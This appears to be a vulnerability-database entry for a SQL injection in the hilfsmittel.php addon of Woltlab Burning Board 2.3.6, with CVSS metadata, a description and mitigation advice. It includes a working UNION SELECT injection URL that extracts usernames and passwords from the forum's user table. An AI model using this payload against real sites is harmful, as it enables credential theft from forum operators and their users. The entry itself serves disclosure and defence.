vendor:
Burning Board
by:
Crazyball
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Burning Board
Affected Version From: 2.3.2006
Affected Version To: 2.3.2006
Patch Exists: N/A
Related CWE: N/A
CPE: a:woltlab:burning_board:2.3.6
Metasploit:
N/A
Other Scripts:
N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References:
N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
n/a
Woltlab Burning Board 2.3.6 Addon (hilfsmittel.php) SQL Injection Vulnerability
A vulnerability exists in the hilfsmittel.php file of Woltlab Burning Board 2.3.6 Addon, which allows an attacker to inject malicious SQL queries via the 'katid' parameter. An attacker can exploit this vulnerability by sending a specially crafted HTTP request to the vulnerable application, such as http://[host]/[path]/hilfsmittel.php?action=read&katid=5'/**/UNION/**/SELECT/**/1,2,concat(username,0x3a,password),4,5,6,7,8,9,10/**/FROM/**/bb1_users/*, which can be used to extract sensitive information from the database.
Mitigation:
To mitigate this vulnerability, the application should use parameterized queries instead of dynamic SQL queries. Additionally, the application should also be configured to use a web application firewall to detect and block malicious requests.
